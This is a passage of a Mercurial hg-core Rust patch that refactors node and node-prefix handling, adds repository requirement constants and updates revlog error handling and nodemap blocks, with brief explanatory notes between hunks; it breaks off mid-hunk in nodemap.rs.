// As of this writing everything rhg does is read-only.
// When it starts writing to the repository, it’ll need to either keep the
// persistent nodemap up to date or remove this entry:
- "persistent-nodemap",
+ NODEMAP_REQUIREMENT,
];
+
+// Copied from mercurial/requirements.py:
+
+/// When narrowing is finalized and no longer subject to format changes,
+/// we should move this to just "narrow" or similar.
+#[allow(unused)]
+pub(crate) const NARROW_REQUIREMENT: &str = "narrowhg-experimental";
+
+/// Enables sparse working directory usage
+#[allow(unused)]
+pub(crate) const SPARSE_REQUIREMENT: &str = "exp-sparse";
+
+/// Enables the internal phase which is used to hide changesets instead
+/// of stripping them
+#[allow(unused)]
+pub(crate) const INTERNAL_PHASE_REQUIREMENT: &str = "internal-phase";
+
+/// Stores manifest in Tree structure
+#[allow(unused)]
+pub(crate) const TREEMANIFEST_REQUIREMENT: &str = "treemanifest";
+
+/// Increment the sub-version when the revlog v2 format changes to lock out old
+/// clients.
+#[allow(unused)]
+pub(crate) const REVLOGV2_REQUIREMENT: &str = "exp-revlogv2.1";
+
+/// A repository with the sparserevlog feature will have delta chains that
+/// can spread over a larger span. Sparse reading cuts these large spans into
+/// pieces, so that each piece isn't too big.
+/// Without the sparserevlog capability, reading from the repository could use
+/// huge amounts of memory, because the whole span would be read at once,
+/// including all the intermediate revisions that aren't pertinent for the
+/// chain. This is why once a repository has enabled sparse-read, it becomes
+/// required.
+#[allow(unused)]
+pub(crate) const SPARSEREVLOG_REQUIREMENT: &str = "sparserevlog";
+
+/// A repository with the sidedataflag requirement will allow storing extra
+/// information for revisions without altering their original hashes.
+#[allow(unused)]
+pub(crate) const SIDEDATA_REQUIREMENT: &str = "exp-sidedata-flag";
+
+/// A repository with the copies-sidedata-changeset requirement will store
+/// copies related information in changeset's sidedata.
+#[allow(unused)]
+pub(crate) const COPIESSDC_REQUIREMENT: &str = "exp-copies-sidedata-changeset";
+
+/// The repository uses a persistent nodemap for the changelog and the manifest.
+#[allow(unused)]
+pub(crate) const NODEMAP_REQUIREMENT: &str = "persistent-nodemap";
+
+/// Denotes that the current repository is a share
+#[allow(unused)]
+pub(crate) const SHARED_REQUIREMENT: &str = "shared";
+
+/// Denotes that the current repository is a share and that the shared source
+/// path is relative to the current repository root path
+#[allow(unused)]
+pub(crate) const RELATIVE_SHARED_REQUIREMENT: &str = "relshared";
+
+/// A repository with share implemented safely. The repository has different
+/// store and working copy requirements, i.e. both `.hg/requires` and
+/// `.hg/store/requires` are present.
+#[allow(unused)]
+pub(crate) const SHARESAFE_REQUIREMENT: &str = "share-safe";
+
+/// A repository that uses zstd compression inside its revlog
+#[allow(unused)]
+pub(crate) const REVLOG_COMPRESSION_ZSTD: &str = "revlog-compression-zstd";
--- a/rust/hg-core/src/revlog.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/revlog.rs Tue Apr 20 11:01:06 2021 -0400
@@ -9,7 +9,7 @@
pub mod nodemap;
mod nodemap_docket;
pub mod path_encode;
-pub use node::{Node, NodeError, NodePrefix, NodePrefixRef};
+pub use node::{FromHexError, Node, NodePrefix};
pub mod changelog;
pub mod index;
pub mod manifest;
@@ -35,6 +35,9 @@
#[allow(clippy::unreadable_literal)]
pub const WORKING_DIRECTORY_REVISION: Revision = 0x7fffffff;
+pub const WORKING_DIRECTORY_HEX: &str =
+ "ffffffffffffffffffffffffffffffffffffffff";
+
/// The simplest expression of what we need of Mercurial DAGs.
pub trait Graph {
/// Return the two parents of the given `Revision`.
--- a/rust/hg-core/src/revlog/changelog.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/revlog/changelog.rs Tue Apr 20 11:01:06 2021 -0400
@@ -1,12 +1,13 @@
+use crate::errors::HgError;
use crate::repo::Repo;
use crate::revlog::revlog::{Revlog, RevlogError};
-use crate::revlog::NodePrefixRef;
use crate::revlog::Revision;
+use crate::revlog::{Node, NodePrefix};
/// A specialized `Revlog` to work with `changelog` data format.
pub struct Changelog {
/// The generic `revlog` format.
- revlog: Revlog,
+ pub(crate) revlog: Revlog,
}
impl Changelog {
@@ -19,7 +20,7 @@
/// Return the `ChangelogEntry` for a given node id.
pub fn get_node(
&self,
- node: NodePrefixRef,
+ node: NodePrefix,
) -> Result<ChangelogEntry, RevlogError> {
let rev = self.revlog.get_node_rev(node)?;
self.get_rev(rev)
@@ -33,6 +34,10 @@
let bytes = self.revlog.get_rev_data(rev)?;
Ok(ChangelogEntry { bytes })
}
+
+ pub fn node_from_rev(&self, rev: Revision) -> Option<&Node> {
+ Some(self.revlog.index.get_entry(rev)?.hash())
+ }
}
/// `Changelog` entry which knows how to interpret the `changelog` data bytes.
@@ -53,6 +58,8 @@
/// Return the node id of the `manifest` referenced by this `changelog`
/// entry.
pub fn manifest_node(&self) -> Result<&[u8], RevlogError> {
- self.lines().next().ok_or(RevlogError::Corrupted)
+ self.lines()
+ .next()
+ .ok_or_else(|| HgError::corrupted("empty changelog entry").into())
}
}
--- a/rust/hg-core/src/revlog/index.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/revlog/index.rs Tue Apr 20 11:01:06 2021 -0400
@@ -3,6 +3,7 @@
use byteorder::{BigEndian, ByteOrder};
+use crate::errors::HgError;
use crate::revlog::node::Node;
use crate::revlog::revlog::RevlogError;
use crate::revlog::{Revision, NULL_REVISION};
@@ -44,7 +45,8 @@
offsets: Some(offsets),
})
} else {
- Err(RevlogError::Corrupted)
+ Err(HgError::corrupted("unexpected inline revlog length")
+ .into())
}
} else {
Ok(Self {
@@ -298,12 +300,12 @@
// Remaining offset bytes.
bytes.extend(&[0u8; 2]);
} else {
- // Offset is only 6 bytes will usize is 8.
- bytes.extend(&self.offset.to_be_bytes()[2..]);
+ // Offset stored on 48 bits (6 bytes)
+ bytes.extend(&(self.offset as u64).to_be_bytes()[2..]);
}
bytes.extend(&[0u8; 2]); // Revision flags.
- bytes.extend(&self.compressed_len.to_be_bytes()[4..]);
- bytes.extend(&self.uncompressed_len.to_be_bytes()[4..]);
+ bytes.extend(&(self.compressed_len as u32).to_be_bytes());
+ bytes.extend(&(self.uncompressed_len as u32).to_be_bytes());
bytes.extend(&self.base_revision.to_be_bytes());
bytes
}
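
The offset fix above matters on 32-bit targets, where `usize::to_be_bytes()` yields only 4 bytes and `[2..]` would keep 2 of the required 6; casting to `u64` first guarantees 8 bytes. A worked sketch of the intended encoding:

    /// Serialize an offset on 48 bits (6 bytes), big-endian, as the revlog
    /// index expects. Illustrative, mirroring the fix above.
    fn offset_to_6_bytes(offset: usize) -> [u8; 6] {
        let be = (offset as u64).to_be_bytes(); // always 8 bytes
        let mut out = [0u8; 6];
        out.copy_from_slice(&be[2..]); // drop the 2 high (zero) bytes
        out
    }

    #[test]
    fn offset_fits_48_bits() {
        assert_eq!(
            offset_to_6_bytes(0x0504_0302),
            [0x00, 0x00, 0x05, 0x04, 0x03, 0x02]
        );
    }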
--- a/rust/hg-core/src/revlog/manifest.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/revlog/manifest.rs Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
use crate::repo::Repo;
use crate::revlog::revlog::{Revlog, RevlogError};
-use crate::revlog::NodePrefixRef;
+use crate::revlog::NodePrefix;
use crate::revlog::Revision;
use crate::utils::hg_path::HgPath;
@@ -20,7 +20,7 @@
/// Return the `ManifestEntry` of a given node id.
pub fn get_node(
&self,
- node: NodePrefixRef,
+ node: NodePrefix,
) -> Result<ManifestEntry, RevlogError> {
let rev = self.revlog.get_node_rev(node)?;
self.get_rev(rev)
--- a/rust/hg-core/src/revlog/node.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/revlog/node.rs Tue Apr 20 11:01:06 2021 -0400
@@ -8,8 +8,10 @@
//! In Mercurial code base, it is customary to call "a node" the binary SHA
//! of a revision.
-use hex::{self, FromHex, FromHexError};
+use crate::errors::HgError;
+use bytes_cast::BytesCast;
use std::convert::{TryFrom, TryInto};
+use std::fmt;
/// The length in bytes of a `Node`
///
@@ -29,6 +31,9 @@
/// see also `NODES_BYTES_LENGTH` about it being private.
const NODE_NYBBLES_LENGTH: usize = 2 * NODE_BYTES_LENGTH;
+/// Default for UI presentation
+const SHORT_PREFIX_DEFAULT_NYBBLES_LENGTH: u8 = 12;
+
/// Private alias for readability and to ease future change
type NodeData = [u8; NODE_BYTES_LENGTH];
@@ -45,11 +50,10 @@
/// if they need a loop boundary.
///
/// All methods that create a `Node` either take a type that enforces
-/// the size or fail immediately at runtime with [`ExactLengthRequired`].
+/// the size or return an error at runtime.
///
/// [`nybbles_len`]: #method.nybbles_len
-/// [`ExactLengthRequired`]: struct.NodeError#variant.ExactLengthRequired
-#[derive(Clone, Debug, PartialEq)]
+#[derive(Copy, Clone, Debug, PartialEq, BytesCast, derive_more::From)]
#[repr(transparent)]
pub struct Node {
data: NodeData,
@@ -60,32 +64,49 @@
data: [0; NODE_BYTES_LENGTH],
};
-impl From<NodeData> for Node {
- fn from(data: NodeData) -> Node {
- Node { data }
+/// Return an error if the slice has an unexpected length
+impl<'a> TryFrom<&'a [u8]> for &'a Node {
+ type Error = ();
+
+ #[inline]
+ fn try_from(bytes: &'a [u8]) -> Result<Self, Self::Error> {
+ match Node::from_bytes(bytes) {
+ Ok((node, rest)) if rest.is_empty() => Ok(node),
+ _ => Err(()),
+ }
}
}
/// Return an error if the slice has an unexpected length
-impl<'a> TryFrom<&'a [u8]> for &'a Node {
+impl TryFrom<&'_ [u8]> for Node {
type Error = std::array::TryFromSliceError;
#[inline]
- fn try_from(bytes: &'a [u8]) -> Result<&'a Node, Self::Error> {
+ fn try_from(bytes: &'_ [u8]) -> Result<Self, Self::Error> {
let data = bytes.try_into()?;
- // Safety: `#[repr(transparent)]` makes it ok to "wrap" the target
- // of a reference to the type of the single field.
- Ok(unsafe { std::mem::transmute::<&NodeData, &Node>(data) })
+ Ok(Self { data })
}
}
-#[derive(Debug, PartialEq)]
-pub enum NodeError {
- ExactLengthRequired(usize, String),
- PrefixTooLong(String),
- HexError(FromHexError, String),
+impl From<&'_ NodeData> for Node {
+ #[inline]
+ fn from(data: &'_ NodeData) -> Self {
+ Self { data: *data }
+ }
}
+impl fmt::LowerHex for Node {
+ fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
+ for &byte in &self.data {
+ write!(f, "{:02x}", byte)?
+ }
+ Ok(())
+ }
+}
+
+#[derive(Debug)]
+pub struct FromHexError;
+
/// Low level utility function, also for prefixes
fn get_nybble(s: &[u8], i: usize) -> u8 {
if i % 2 == 0 {
@@ -117,18 +138,26 @@
///
/// To be used in FFI and I/O only, in order to facilitate future
/// changes of hash format.
- pub fn from_hex(hex: impl AsRef<[u8]>) -> Result<Node, NodeError> {
- Ok(NodeData::from_hex(hex.as_ref())
- .map_err(|e| NodeError::from((e, hex)))?
- .into())
+ pub fn from_hex(hex: impl AsRef<[u8]>) -> Result<Node, FromHexError> {
+ let prefix = NodePrefix::from_hex(hex)?;
+ if prefix.nybbles_len() == NODE_NYBBLES_LENGTH {
+ Ok(Self { data: prefix.data })
+ } else {
+ Err(FromHexError)
+ }
}
- /// Convert to hexadecimal string representation
+ /// `from_hex`, but for input from an internal file of the repository such
+ /// as a changelog or manifest entry.
///
- /// To be used in FFI and I/O only, in order to facilitate future
- /// changes of hash format.
- pub fn encode_hex(&self) -> String {
- hex::encode(self.data)
+ /// An error is treated as repository corruption.
+ pub fn from_hex_for_repo(hex: impl AsRef<[u8]>) -> Result<Node, HgError> {
+ Self::from_hex(hex.as_ref()).map_err(|FromHexError| {
+ HgError::CorruptedRepository(format!(
+ "Expected a full hexadecimal node ID, found {}",
+ String::from_utf8_lossy(hex.as_ref())
+ ))
+ })
}
/// Provide access to binary data
@@ -138,17 +167,11 @@
pub fn as_bytes(&self) -> &[u8] {
&self.data
}
-}
-impl<T: AsRef<[u8]>> From<(FromHexError, T)> for NodeError {
- fn from(err_offender: (FromHexError, T)) -> Self {
- let (err, offender) = err_offender;
- let offender = String::from_utf8_lossy(offender.as_ref()).into_owned();
- match err {
- FromHexError::InvalidStringLength => {
- NodeError::ExactLengthRequired(NODE_NYBBLES_LENGTH, offender)
- }
- _ => NodeError::HexError(err, offender),
+ pub fn short(&self) -> NodePrefix {
+ NodePrefix {
+ nybbles_len: SHORT_PREFIX_DEFAULT_NYBBLES_LENGTH,
+ data: self.data,
}
}
}
@@ -158,10 +181,14 @@
/// Since it can potentially come from an hexadecimal representation with
/// odd length, it needs to carry around whether the last 4 bits are relevant
/// or not.
-#[derive(Debug, PartialEq)]
+#[derive(Debug, PartialEq, Copy, Clone)]
pub struct NodePrefix {
- buf: Vec<u8>,
- is_odd: bool,
+ /// In `1..=NODE_NYBBLES_LENGTH`
+ nybbles_len: u8,
+ /// The first `4 * nybbles_len` bits are used (considering bits
+ /// within a byte in big-endian order: most significant first), the rest
+ /// are zero.
+ data: NodeData,
}
impl NodePrefix {
@@ -172,72 +199,42 @@
///
/// To be used in FFI and I/O only, in order to facilitate future
/// changes of hash format.
- pub fn from_hex(hex: impl AsRef<[u8]>) -> Result<Self, NodeError> {
+ pub fn from_hex(hex: impl AsRef<[u8]>) -> Result<Self, FromHexError> {
let hex = hex.as_ref();
let len = hex.len();
- if len > NODE_NYBBLES_LENGTH {
- return Err(NodeError::PrefixTooLong(
- String::from_utf8_lossy(hex).to_owned().to_string(),
- ));
+ if len > NODE_NYBBLES_LENGTH || len == 0 {
+ return Err(FromHexError);
}
- let is_odd = len % 2 == 1;
- let even_part = if is_odd { &hex[..len - 1] } else { hex };
- let mut buf: Vec<u8> =
- Vec::from_hex(&even_part).map_err(|e| (e, hex))?;
-
- if is_odd {
- let latest_char = char::from(hex[len - 1]);
- let latest_nybble = latest_char.to_digit(16).ok_or_else(|| {
- (
- FromHexError::InvalidHexCharacter {
- c: latest_char,
- index: len - 1,
- },
- hex,
- )
- })? as u8;
- buf.push(latest_nybble << 4);
+ let mut data = [0; NODE_BYTES_LENGTH];
+ let mut nybbles_len = 0;
+ for &ascii_byte in hex {
+ let nybble = match char::from(ascii_byte).to_digit(16) {
+ Some(digit) => digit as u8,
+ None => return Err(FromHexError),
+ };
+ // Fill in the upper half of a byte first, then the lower half.
+ let shift = if nybbles_len % 2 == 0 { 4 } else { 0 };
+ data[nybbles_len as usize / 2] |= nybble << shift;
+ nybbles_len += 1;
}
- Ok(NodePrefix { buf, is_odd })
+ Ok(Self { data, nybbles_len })
}
- pub fn borrow(&self) -> NodePrefixRef {
- NodePrefixRef {
- buf: &self.buf,
- is_odd: self.is_odd,
- }
- }
-}
-
-#[derive(Clone, Debug, PartialEq)]
-pub struct NodePrefixRef<'a> {
- buf: &'a [u8],
- is_odd: bool,
-}
-
-impl<'a> NodePrefixRef<'a> {
- pub fn len(&self) -> usize {
- if self.is_odd {
- self.buf.len() * 2 - 1
- } else {
- self.buf.len() * 2
- }
- }
-
- pub fn is_empty(&self) -> bool {
- self.len() == 0
+ pub fn nybbles_len(&self) -> usize {
+ self.nybbles_len as _
}
pub fn is_prefix_of(&self, node: &Node) -> bool {
- if self.is_odd {
- let buf = self.buf;
- let last_pos = buf.len() - 1;
- node.data.starts_with(buf.split_at(last_pos).0)
- && node.data[last_pos] >> 4 == buf[last_pos] >> 4
- } else {
- node.data.starts_with(self.buf)
+ let full_bytes = self.nybbles_len() / 2;
+ if self.data[..full_bytes] != node.data[..full_bytes] {
+ return false;
}
+ if self.nybbles_len() % 2 == 0 {
+ return true;
+ }
+ let last = self.nybbles_len() - 1;
+ self.get_nybble(last) == node.get_nybble(last)
}
/// Retrieve the `i`th half-byte from the prefix.
@@ -245,8 +242,12 @@
/// This is also the `i`th hexadecimal digit in numeric form,
/// also called a [nybble](https://en.wikipedia.org/wiki/Nibble).
pub fn get_nybble(&self, i: usize) -> u8 {
- assert!(i < self.len());
- get_nybble(self.buf, i)
+ assert!(i < self.nybbles_len());
+ get_nybble(&self.data, i)
+ }
+
+ fn iter_nybbles(&self) -> impl Iterator<Item = u8> + '_ {
+ (0..self.nybbles_len()).map(move |i| get_nybble(&self.data, i))
}
/// Return the index of the first nybble that's different from `node`
@@ -257,42 +258,49 @@
///
/// Returned index is as in `get_nybble`, i.e., starting at 0.
pub fn first_different_nybble(&self, node: &Node) -> Option<usize> {
- let buf = self.buf;
- let until = if self.is_odd {
- buf.len() - 1
- } else {
- buf.len()
- };
- for (i, item) in buf.iter().enumerate().take(until) {
- if *item != node.data[i] {
- return if *item & 0xf0 == node.data[i] & 0xf0 {
- Some(2 * i + 1)
- } else {
- Some(2 * i)
- };
- }
+ self.iter_nybbles()
+ .zip(NodePrefix::from(*node).iter_nybbles())
+ .position(|(a, b)| a != b)
+ }
+}
+
+impl fmt::LowerHex for NodePrefix {
+ fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
+ let full_bytes = self.nybbles_len() / 2;
+ for &byte in &self.data[..full_bytes] {
+ write!(f, "{:02x}", byte)?
}
- if self.is_odd && buf[until] & 0xf0 != node.data[until] & 0xf0 {
- Some(until * 2)
- } else {
- None
+ if self.nybbles_len() % 2 == 1 {
+ let last = self.nybbles_len() - 1;
+ write!(f, "{:x}", self.get_nybble(last))?
+ }
+ Ok(())
+ }
+}
+
+/// A shortcut for full `Node` references
+impl From<&'_ Node> for NodePrefix {
+ fn from(node: &'_ Node) -> Self {
+ NodePrefix {
+ nybbles_len: node.nybbles_len() as _,
+ data: node.data,
}
}
}
/// A shortcut for full `Node` references
-impl<'a> From<&'a Node> for NodePrefixRef<'a> {
- fn from(node: &'a Node) -> Self {
- NodePrefixRef {
- buf: &node.data,
- is_odd: false,
+impl From<Node> for NodePrefix {
+ fn from(node: Node) -> Self {
+ NodePrefix {
+ nybbles_len: node.nybbles_len() as _,
+ data: node.data,
}
}
}
-impl PartialEq<Node> for NodePrefixRef<'_> {
+impl PartialEq<Node> for NodePrefix {
fn eq(&self, other: &Node) -> bool {
- !self.is_odd && self.buf == other.data
+ Self::from(*other) == *self
}
}
@@ -300,18 +308,16 @@
mod tests {
use super::*;
- fn sample_node() -> Node {
- let mut data = [0; NODE_BYTES_LENGTH];
- data.copy_from_slice(&[
+ const SAMPLE_NODE_HEX: &str = "0123456789abcdeffedcba9876543210deadbeef";
+ const SAMPLE_NODE: Node = Node {
+ data: [
0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef, 0xfe, 0xdc, 0xba,
0x98, 0x76, 0x54, 0x32, 0x10, 0xde, 0xad, 0xbe, 0xef,
- ]);
- data.into()
- }
+ ],
+ };
/// Pad a hexadecimal string to reach `NODE_NYBBLES_LENGTH`
- ///check_hash
- /// The padding is made with zeros
+ /// The padding is made with zeros.
pub fn hex_pad_right(hex: &str) -> String {
let mut res = hex.to_string();
while res.len() < NODE_NYBBLES_LENGTH {
@@ -320,135 +326,88 @@
res
}
- fn sample_node_hex() -> String {
- hex_pad_right("0123456789abcdeffedcba9876543210deadbeef")
- }
-
#[test]
fn test_node_from_hex() {
- assert_eq!(Node::from_hex(&sample_node_hex()), Ok(sample_node()));
-
- let mut short = hex_pad_right("0123");
- short.pop();
- short.pop();
- assert_eq!(
- Node::from_hex(&short),
- Err(NodeError::ExactLengthRequired(NODE_NYBBLES_LENGTH, short)),
- );
-
- let not_hex = hex_pad_right("012... oops");
- assert_eq!(
- Node::from_hex(&not_hex),
- Err(NodeError::HexError(
- FromHexError::InvalidHexCharacter { c: '.', index: 3 },
- not_hex,
- )),
- );
+ let not_hex = "012... oops";
+ let too_short = "0123";
+ let too_long = format!("{}0", SAMPLE_NODE_HEX);
+ assert_eq!(Node::from_hex(SAMPLE_NODE_HEX).unwrap(), SAMPLE_NODE);
+ assert!(Node::from_hex(not_hex).is_err());
+ assert!(Node::from_hex(too_short).is_err());
+ assert!(Node::from_hex(&too_long).is_err());
}
#[test]
fn test_node_encode_hex() {
- assert_eq!(sample_node().encode_hex(), sample_node_hex());
+ assert_eq!(format!("{:x}", SAMPLE_NODE), SAMPLE_NODE_HEX);
}
#[test]
- fn test_prefix_from_hex() -> Result<(), NodeError> {
- assert_eq!(
- NodePrefix::from_hex("0e1")?,
- NodePrefix {
- buf: vec![14, 16],
- is_odd: true
- }
- );
+ fn test_prefix_from_to_hex() -> Result<(), FromHexError> {
+ assert_eq!(format!("{:x}", NodePrefix::from_hex("0e1")?), "0e1");
+ assert_eq!(format!("{:x}", NodePrefix::from_hex("0e1a")?), "0e1a");
assert_eq!(
- NodePrefix::from_hex("0e1a")?,
- NodePrefix {
- buf: vec![14, 26],
- is_odd: false
- }
+ format!("{:x}", NodePrefix::from_hex(SAMPLE_NODE_HEX)?),
+ SAMPLE_NODE_HEX
);
-
- // checking limit case
- let node_as_vec = sample_node().data.iter().cloned().collect();
- assert_eq!(
- NodePrefix::from_hex(sample_node_hex())?,
- NodePrefix {
- buf: node_as_vec,
- is_odd: false
- }
- );
-
Ok(())
}
#[test]
fn test_prefix_from_hex_errors() {
- assert_eq!(
- NodePrefix::from_hex("testgr"),
- Err(NodeError::HexError(
- FromHexError::InvalidHexCharacter { c: 't', index: 0 },
- "testgr".to_string()
- ))
- );
- let mut long = NULL_NODE.encode_hex();
+ assert!(NodePrefix::from_hex("testgr").is_err());
+ let mut long = format!("{:x}", NULL_NODE);
long.push('c');
- match NodePrefix::from_hex(&long)
- .expect_err("should be refused as too long")
- {
- NodeError::PrefixTooLong(s) => assert_eq!(s, long),
- err => panic!(format!("Should have been TooLong, got {:?}", err)),
- }
+ assert!(NodePrefix::from_hex(&long).is_err())
}
#[test]
- fn test_is_prefix_of() -> Result<(), NodeError> {
+ fn test_is_prefix_of() -> Result<(), FromHexError> {
let mut node_data = [0; NODE_BYTES_LENGTH];
node_data[0] = 0x12;
node_data[1] = 0xca;
let node = Node::from(node_data);
- assert!(NodePrefix::from_hex("12")?.borrow().is_prefix_of(&node));
- assert!(!NodePrefix::from_hex("1a")?.borrow().is_prefix_of(&node));
- assert!(NodePrefix::from_hex("12c")?.borrow().is_prefix_of(&node));
- assert!(!NodePrefix::from_hex("12d")?.borrow().is_prefix_of(&node));
+ assert!(NodePrefix::from_hex("12")?.is_prefix_of(&node));
+ assert!(!NodePrefix::from_hex("1a")?.is_prefix_of(&node));
+ assert!(NodePrefix::from_hex("12c")?.is_prefix_of(&node));
+ assert!(!NodePrefix::from_hex("12d")?.is_prefix_of(&node));
Ok(())
}
#[test]
- fn test_get_nybble() -> Result<(), NodeError> {
+ fn test_get_nybble() -> Result<(), FromHexError> {
let prefix = NodePrefix::from_hex("dead6789cafe")?;
- assert_eq!(prefix.borrow().get_nybble(0), 13);
- assert_eq!(prefix.borrow().get_nybble(7), 9);
+ assert_eq!(prefix.get_nybble(0), 13);
+ assert_eq!(prefix.get_nybble(7), 9);
Ok(())
}
#[test]
fn test_first_different_nybble_even_prefix() {
let prefix = NodePrefix::from_hex("12ca").unwrap();
- let prefref = prefix.borrow();
let mut node = Node::from([0; NODE_BYTES_LENGTH]);
- assert_eq!(prefref.first_different_nybble(&node), Some(0));
+ assert_eq!(prefix.first_different_nybble(&node), Some(0));
node.data[0] = 0x13;
- assert_eq!(prefref.first_different_nybble(&node), Some(1));
+ assert_eq!(prefix.first_different_nybble(&node), Some(1));
node.data[0] = 0x12;
- assert_eq!(prefref.first_different_nybble(&node), Some(2));
+ assert_eq!(prefix.first_different_nybble(&node), Some(2));
node.data[1] = 0xca;
// now it is a prefix
- assert_eq!(prefref.first_different_nybble(&node), None);
+ assert_eq!(prefix.first_different_nybble(&node), None);
}
#[test]
fn test_first_different_nybble_odd_prefix() {
let prefix = NodePrefix::from_hex("12c").unwrap();
- let prefref = prefix.borrow();
let mut node = Node::from([0; NODE_BYTES_LENGTH]);
- assert_eq!(prefref.first_different_nybble(&node), Some(0));
+ assert_eq!(prefix.first_different_nybble(&node), Some(0));
node.data[0] = 0x13;
- assert_eq!(prefref.first_different_nybble(&node), Some(1));
+ assert_eq!(prefix.first_different_nybble(&node), Some(1));
node.data[0] = 0x12;
- assert_eq!(prefref.first_different_nybble(&node), Some(2));
+ assert_eq!(prefix.first_different_nybble(&node), Some(2));
node.data[1] = 0xca;
// now it is a prefix
- assert_eq!(prefref.first_different_nybble(&node), None);
+ assert_eq!(prefix.first_different_nybble(&node), None);
}
}
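
Taken together, the new `NodePrefix` stores an odd-length hex prefix in a fixed 20-byte buffer plus a nybble count, instead of the old `Vec<u8>` + `is_odd` pair. A minimal standalone sketch of that packing (the names `BYTES` and `pack_hex` are illustrative, not part of hg-core):

    const BYTES: usize = 20; // mirrors NODE_BYTES_LENGTH for SHA-1 hashes

    fn pack_hex(hex: &str) -> Option<([u8; BYTES], u8)> {
        if hex.is_empty() || hex.len() > 2 * BYTES {
            return None;
        }
        let mut data = [0u8; BYTES];
        let mut nybbles_len = 0u8;
        for byte in hex.bytes() {
            let nybble = char::from(byte).to_digit(16)? as u8;
            // The upper half of each byte is filled first (big-endian nybbles).
            let shift = if nybbles_len % 2 == 0 { 4 } else { 0 };
            data[nybbles_len as usize / 2] |= nybble << shift;
            nybbles_len += 1;
        }
        Some((data, nybbles_len))
    }

    fn main() {
        let (data, len) = pack_hex("12c").unwrap();
        assert_eq!((len, data[0], data[1]), (3, 0x12, 0xc0));
        // The odd trailing nybble lands in the high half of its byte, which
        // is why `is_prefix_of` compares the last nybble separately.
    }
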
--- a/rust/hg-core/src/revlog/nodemap.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/revlog/nodemap.rs Tue Apr 20 11:01:06 2021 -0400
@@ -13,31 +13,23 @@
//! is used in a more abstract context.
use super::{
- node::NULL_NODE, Node, NodeError, NodePrefix, NodePrefixRef, Revision,
- RevlogIndex, NULL_REVISION,
+ node::NULL_NODE, Node, NodePrefix, Revision, RevlogIndex, NULL_REVISION,
};
+use bytes_cast::{unaligned, BytesCast};
use std::cmp::max;
use std::fmt;
-use std::mem;
+use std::mem::{self, align_of, size_of};
use std::ops::Deref;
use std::ops::Index;
-use std::slice;
#[derive(Debug, PartialEq)]
pub enum NodeMapError {
MultipleResults,
- InvalidNodePrefix(NodeError),
/// A `Revision` stored in the nodemap could not be found in the index
RevisionNotInIndex(Revision),
}
-impl From<NodeError> for NodeMapError {
- fn from(err: NodeError) -> Self {
- NodeMapError::InvalidNodePrefix(err)
- }
-}
-
/// Mapping system from Mercurial nodes to revision numbers.
///
/// ## `RevlogIndex` and `NodeMap`
@@ -82,24 +74,9 @@
fn find_bin<'a>(
&self,
idx: &impl RevlogIndex,
- prefix: NodePrefixRef<'a>,
+ prefix: NodePrefix,
) -> Result<Option<Revision>, NodeMapError>;
- /// Find the unique Revision whose `Node` hexadecimal string representation
- /// starts with a given prefix
- ///
- /// If no Revision matches the given prefix, `Ok(None)` is returned.
- ///
- /// If several Revisions match the given prefix, a [`MultipleResults`]
- /// error is returned.
- fn find_hex(
- &self,
- idx: &impl RevlogIndex,
- prefix: &str,
- ) -> Result<Option<Revision>, NodeMapError> {
- self.find_bin(idx, NodePrefix::from_hex(prefix)?.borrow())
- }
-
/// Give the size of the shortest node prefix that determines
/// the revision uniquely.
///
@@ -114,19 +91,9 @@
fn unique_prefix_len_bin<'a>(
&self,
idx: &impl RevlogIndex,
- node_prefix: NodePrefixRef<'a>,
+ node_prefix: NodePrefix,
) -> Result<Option<usize>, NodeMapError>;
- /// Same as `unique_prefix_len_bin`, with the hexadecimal representation
- /// of the prefix as input.
- fn unique_prefix_len_hex(
- &self,
- idx: &impl RevlogIndex,
- prefix: &str,
- ) -> Result<Option<usize>, NodeMapError> {
- self.unique_prefix_len_bin(idx, NodePrefix::from_hex(prefix)?.borrow())
- }
-
/// Same as `unique_prefix_len_bin`, with a full `Node` as input
fn unique_prefix_len_node(
&self,
@@ -149,7 +116,7 @@
/// Low level NodeTree [`Blocks`] elements
///
/// These are exactly as found, for instance, on persistent storage.
-type RawElement = i32;
+type RawElement = unaligned::I32Be;
/// High level representation of values in NodeTree
/// [`Blocks`](struct.Block.html)
@@ -168,23 +135,24 @@
///
/// See [`Block`](struct.Block.html) for explanation about the encoding.
fn from(raw: RawElement) -> Element {
- if raw >= 0 {
- Element::Block(raw as usize)
- } else if raw == -1 {
+ let int = raw.get();
+ if int >= 0 {
+ Element::Block(int as usize)
+ } else if int == -1 {
Element::None
} else {
- Element::Rev(-raw - 2)
+ Element::Rev(-int - 2)
}
}
}
impl From<Element> for RawElement {
fn from(element: Element) -> RawElement {
- match element {
+ RawElement::from(match element {
Element::None => 0,
- Element::Block(i) => i as RawElement,
+ Element::Block(i) => i as i32,
Element::Rev(rev) => -rev - 2,
- }
+ })
}
}
@@ -212,42 +180,24 @@
/// represented at all, because we want an immutable empty nodetree
/// to be valid.
-#[derive(Copy, Clone)]
-pub struct Block([u8; BLOCK_SIZE]);
+const ELEMENTS_PER_BLOCK: usize = 16; // number of different values in a nybble
-/// Not derivable for arrays of length >32 until const generics are stable
-impl PartialEq for Block {
- fn eq(&self, other: &Self) -> bool {
- self.0[..] == other.0[..]
- }
-}
-
-pub const BLOCK_SIZE: usize = 64;
+#[derive(Copy, Clone, BytesCast, PartialEq)]
+#[repr(transparent)]
+pub struct Block([RawElement; ELEMENTS_PER_BLOCK]);
impl Block {
fn new() -> Self {
- // -1 in 2's complement to create an absent node
- let byte: u8 = 255;
- Block([byte; BLOCK_SIZE])
+ let absent_node = RawElement::from(-1);
+ Block([absent_node; ELEMENTS_PER_BLOCK])
}
fn get(&self, nybble: u8) -> Element {
- let index = nybble as usize * mem::size_of::<RawElement>();
- Element::from(RawElement::from_be_bytes([
- self.0[index],
- self.0[index + 1],
- self.0[index + 2],
- self.0[index + 3],
- ]))
+ self.0[nybble as usize].into()
}
